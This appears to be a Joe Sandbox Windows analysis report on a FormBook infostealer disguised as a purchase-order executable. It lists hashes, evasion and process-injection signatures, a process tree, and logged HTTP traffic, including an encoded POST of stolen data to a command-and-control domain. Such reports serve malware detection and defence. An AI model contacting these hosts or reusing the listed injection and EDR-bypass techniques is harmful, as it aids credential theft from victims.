Edit tour

Windows Analysis Report
PO 768733 - 6750.exe

Overview

General Information

Sample name:	PO 768733 - 6750.exe
Analysis ID:	1665582
MD5:	c8917ca8fb0e14d9e97a453ca8c82f1b
SHA1:	068e95cfb96b7a402db449d02d1f21b8f168f5ad
SHA256:	e1e9eaab9c48a22be33b5994a2d47ff820dd1a080b9cc17e3025fd43d84450f3
Tags:	exeuser-threatcat_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Yara detected FormBook

.NET source code contains potential unpacker

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

PO 768733 - 6750.exe (PID: 6760 cmdline: "C:\Users\user\Desktop\PO 768733 - 6750.exe" MD5: C8917CA8FB0E14D9E97A453CA8C82F1B)

PO 768733 - 6750.exe (PID: 6964 cmdline: "C:\Users\user\Desktop\PO 768733 - 6750.exe" MD5: C8917CA8FB0E14D9E97A453CA8C82F1B)

qMWzFch3YSFcC7wtIS.exe (PID: 5880 cmdline: "C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\wPGOn6NKhtsmE.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

Utilman.exe (PID: 3280 cmdline: "C:\Windows\SysWOW64\Utilman.exe" MD5: 4F59EE095E37A83CDCB74091C807AFA9)

qMWzFch3YSFcC7wtIS.exe (PID: 4216 cmdline: "C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\3beKNlZ4oZ7Ww0.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

firefox.exe (PID: 1064 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000A.00000002.2495622349.0000000002B70000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1561829996.0000000001090000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.2497896046.00000000031C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.2497730850.0000000003170000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1563152160.0000000002D30000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1561491598.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.2498125651.0000000004260000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.PO 768733 - 6750.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.PO 768733 - 6750.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

HTTP traffic detected: POST /l81p/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cache-Control: max-age=0Content-Length: 209Content-Type: application/x-www-form-urlencodedConnection: closeHost: www.globedesign.xyzOrigin: http://www.globedesign.xyzReferer: http://www.globedesign.xyz/l81p/User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.1.2576 Mobile Safari/537.35+Data Raw: 57 58 4b 44 3d 50 31 68 45 44 62 74 4c 78 44 45 34 45 34 2f 41 51 44 38 68 77 37 7a 47 31 59 59 77 31 45 6c 56 41 6a 6f 47 2f 73 4b 65 42 74 4a 43 30 7a 58 4a 2b 56 44 55 39 77 6d 52 66 4a 2b 54 42 4f 76 68 59 42 6f 72 71 2b 4a 7a 30 38 52 58 6f 54 39 6d 50 42 73 69 72 6a 46 4b 53 66 6d 2b 55 36 66 57 6b 6c 6b 73 74 2b 6a 73 47 69 71 61 4c 6d 41 75 4e 72 69 76 4a 75 48 68 31 61 69 39 4a 48 37 68 51 70 45 63 4e 4a 7a 64 53 45 6a 2f 39 58 39 6e 57 31 56 47 56 50 6d 61 6f 68 68 72 47 56 55 6f 33 55 4a 54 31 44 73 41 39 38 72 54 35 57 71 32 55 4b 4c 52 54 7a 69 30 4c 4f 34 65 78 77 53 78 44 39 68 68 56 76 56 33 36 64 51 43 Data Ascii: WXKD=P1hEDbtLxDE4E4/AQD8hw7zG1YYw1ElVAjoG/sKeBtJC0zXJ+VDU9wmRfJ+TBOvhYBorq+Jz08RXoT9mPBsirjFKSfm+U6fWklkst+jsGiqaLmAuNrivJuHh1ai9JH7hQpEcNJzdSEj/9X9nW1VGVPmaohhrGVUo3UJT1DsA98rT5Wq2UKLRTzi0LO4exwSxD9hhVvV36dQC

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Apr 2025 15:20:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 31Connection: closeVary: Accept-EncodingSet-Cookie: from=noref; expires=Wed, 16-Apr-2025 15:20:18 GMT; Max-Age=86400; path=/Set-Cookie: lfrom=noref; expires=Wed, 16-Apr-2025 15:20:18 GMT; Max-Age=86400; path=/Set-Cookie: idcheck=1744730418; expires=Wed, 16-Apr-2025 15:20:18 GMT; Max-Age=86400; path=/Set-Cookie: lp=%2Fr1zl%2F%3FWXKD%3DRMtocHhLv4PviDOPrz7fLuI5CuhecpuuCdUbVP3porp0rsRMSXBGxxdZR279wH8k7MV0UwICfeYC4O3VpK1XUM7OjfeUkPQONsU9uKSbOuB3Z7M7%2B9NrRk%2BhJu08ewbYw6KraIs%3D%26L8pt1%3D9Jot2pbh; expires=Wed, 16-Apr-2025 15:20:18 GMT; Max-Age=86400; path=/Set-Cookie: last_url=content; expires=Wed, 16-Apr-2025 15:20:18 GMT; Max-Age=86400; path=/Set-Cookie: to=%7Curl; expires=Wed, 16-Apr-2025 15:20:18 GMT; Max-Age=86400; path=/Data Raw: 20 20 20 20 20 20 20 20 43 6f 6e 74 65 6e 74 20 6e 6f 74 20 66 6f 75 6e 64 20 70 61 67 65 20 Data Ascii: Content not found page
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:20:48 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:20:50 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:20:53 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:20:56 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: qMWzFch3YSFcC7wtIS.exe, 0000000B.00000002.2499971601.0000000004FAE000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.mslgdkor.xyz
Source: qMWzFch3YSFcC7wtIS.exe, 0000000B.00000002.2499971601.0000000004FAE000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.mslgdkor.xyz/9y3c/
Source: Utilman.exe, 0000000A.00000003.1762831142.0000000008108000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: Utilman.exe, 0000000A.00000003.1762831142.0000000008108000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Utilman.exe, 0000000A.00000003.1762831142.0000000008108000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Utilman.exe, 0000000A.00000003.1762831142.0000000008108000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Utilman.exe, 0000000A.00000003.1762831142.0000000008108000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Utilman.exe, 0000000A.00000003.1762831142.0000000008108000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20-
Source: Utilman.exe, 0000000A.00000003.1762831142.0000000008108000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Utilman.exe, 0000000A.00000003.1762831142.0000000008108000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: Utilman.exe, 0000000A.00000002.2496001959.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: Utilman.exe, 0000000A.00000002.2496001959.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: Utilman.exe, 0000000A.00000003.1756152442.00000000080F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: Utilman.exe, 0000000A.00000002.2496001959.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&
Source: Utilman.exe, 0000000A.00000002.2496001959.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: Utilman.exe, 0000000A.00000002.2496001959.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: Utilman.exe, 0000000A.00000002.2496001959.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033M
Source: Utilman.exe, 0000000A.00000002.2496001959.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: Utilman.exe, 0000000A.00000002.2496001959.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: Utilman.exe, 0000000A.00000003.1762831142.0000000008108000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: Utilman.exe, 0000000A.00000003.1762831142.0000000008108000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.PO 768733 - 6750.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PO 768733 - 6750.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2495622349.0000000002B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1561829996.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2497896046.00000000031C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2497730850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1563152160.0000000002D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1561491598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2498125651.0000000004260000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0042C4B3 NtClose,	2_2_0042C4B3
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01652B60 NtClose,LdrInitializeThunk,	2_2_01652B60
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01652DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_01652DF0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01652C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_01652C70
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016535C0 NtCreateMutant,LdrInitializeThunk,	2_2_016535C0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01654340 NtSetContextThread,	2_2_01654340
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01654650 NtSuspendThread,	2_2_01654650
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01652BE0 NtQueryValueKey,	2_2_01652BE0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01652BF0 NtAllocateVirtualMemory,	2_2_01652BF0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01652BA0 NtEnumerateValueKey,	2_2_01652BA0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01652B80 NtQueryInformationFile,	2_2_01652B80
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01652AF0 NtWriteFile,	2_2_01652AF0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01652AD0 NtReadFile,	2_2_01652AD0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01652AB0 NtWaitForSingleObject,	2_2_01652AB0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01652D30 NtUnmapViewOfSection,	2_2_01652D30
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01652D00 NtSetInformationFile,	2_2_01652D00
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01652D10 NtMapViewOfSection,	2_2_01652D10
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01652DD0 NtDelayExecution,	2_2_01652DD0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01652DB0 NtEnumerateKey,	2_2_01652DB0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01652C60 NtCreateKey,	2_2_01652C60
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01652C00 NtQueryInformationProcess,	2_2_01652C00
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01652CF0 NtOpenProcess,	2_2_01652CF0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01652CC0 NtQueryVirtualMemory,	2_2_01652CC0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01652CA0 NtQueryInformationToken,	2_2_01652CA0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01652F60 NtCreateProcessEx,	2_2_01652F60
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01652F30 NtCreateSection,	2_2_01652F30
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01652FE0 NtCreateFile,	2_2_01652FE0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01652FA0 NtQuerySection,	2_2_01652FA0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01652FB0 NtResumeThread,	2_2_01652FB0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01652F90 NtProtectVirtualMemory,	2_2_01652F90
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01652E30 NtWriteVirtualMemory,	2_2_01652E30
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01652EE0 NtQueueApcThread,	2_2_01652EE0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01652EA0 NtAdjustPrivilegesToken,	2_2_01652EA0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01652E80 NtReadVirtualMemory,	2_2_01652E80
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01653010 NtOpenDirectoryObject,	2_2_01653010
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01653090 NtSetValueKey,	2_2_01653090
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016539B0 NtGetContextThread,	2_2_016539B0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01653D70 NtOpenThread,	2_2_01653D70
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01653D10 NtOpenProcessToken,	2_2_01653D10
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB4650 NtSuspendThread,LdrInitializeThunk,	10_2_04DB4650
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB4340 NtSetContextThread,LdrInitializeThunk,	10_2_04DB4340
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB2CA0 NtQueryInformationToken,LdrInitializeThunk,	10_2_04DB2CA0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB2C70 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_04DB2C70
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB2C60 NtCreateKey,LdrInitializeThunk,	10_2_04DB2C60
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB2DD0 NtDelayExecution,LdrInitializeThunk,	10_2_04DB2DD0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB2DF0 NtQuerySystemInformation,LdrInitializeThunk,	10_2_04DB2DF0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB2D10 NtMapViewOfSection,LdrInitializeThunk,	10_2_04DB2D10
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB2D30 NtUnmapViewOfSection,LdrInitializeThunk,	10_2_04DB2D30
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB2EE0 NtQueueApcThread,LdrInitializeThunk,	10_2_04DB2EE0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB2E80 NtReadVirtualMemory,LdrInitializeThunk,	10_2_04DB2E80
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB2FE0 NtCreateFile,LdrInitializeThunk,	10_2_04DB2FE0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB2FB0 NtResumeThread,LdrInitializeThunk,	10_2_04DB2FB0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB2F30 NtCreateSection,LdrInitializeThunk,	10_2_04DB2F30
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB2AD0 NtReadFile,LdrInitializeThunk,	10_2_04DB2AD0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB2AF0 NtWriteFile,LdrInitializeThunk,	10_2_04DB2AF0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	10_2_04DB2BF0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB2BE0 NtQueryValueKey,LdrInitializeThunk,	10_2_04DB2BE0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB2BA0 NtEnumerateValueKey,LdrInitializeThunk,	10_2_04DB2BA0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB2B60 NtClose,LdrInitializeThunk,	10_2_04DB2B60
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB35C0 NtCreateMutant,LdrInitializeThunk,	10_2_04DB35C0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB39B0 NtGetContextThread,LdrInitializeThunk,	10_2_04DB39B0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB2CC0 NtQueryVirtualMemory,	10_2_04DB2CC0
